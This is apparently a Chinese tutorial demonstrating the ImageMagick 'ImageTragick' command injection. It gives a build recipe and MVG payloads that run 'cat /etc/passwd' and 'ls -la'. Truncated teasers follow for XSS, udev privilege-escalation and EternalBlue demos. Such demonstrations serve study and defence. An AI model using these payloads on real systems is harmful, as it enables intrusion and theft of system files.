centos安裝
wget
tar zvxf imagemagick-6.4.0-0.tar.gz
cd imagemagick-6.4.0-0
./configure --prefix=/usr/locate/imagemagick-6.4.0 --with-quantum-depth=8
make
make install
偽造,把下面的幾行內容複製到記事本,然後改為名字尾。
注意url那裡一定要https才行,後面的cat /etc/passwd是linux命令
push graphic-context
viewbox 0 0 640 480
fill 'url( "|cat /etc/passwd ")'
pop graphic-context
下面這個是freebuf提供的例子,帶引數的命令
push graphic-context
viewbox 0 0 640 480
fill 'url( "|ls "-la)'
pop graphic-context
執行
測試了兩個版本6.4.0和6.7.2,都有bug
XSS漏洞演示
1 儲存型xss 簡介 注入的惡意指令碼永久儲存在 web 應用程式的資料庫伺服器中,因此這種攻擊不需要對使用者執行任何網路釣魚技術。過程 1 構造惡意指令碼,寫入資料庫 2 客戶訪問 返回惡意資料 遇到問題 不能解析admin資料夾裡面的html檔案,沒有找到解決辦法,於是將html字尾改成了ph...
Linux攻防之udev漏洞演示
此漏洞針對linux2.6核心,只要有普通使用者許可權,即可提公升root許可權,開始實驗吧 1 複製以下 儲存為udev.sh,並賦予可執行許可權 2 useradd test 新建乙個普通使用者 3 su test 切換至test使用者 4 ps ef grep udev 檢視udev id r...
勒索病毒 (遠端執行漏洞 演示)
先決條件 kali系統 一台剛裝好的win7 在kali的命令列中輸入一下命令 git clone 然後將指令碼拷貝到 usr share metasploit framework modules exploits windows smb cd eternalblue doublepulsar me...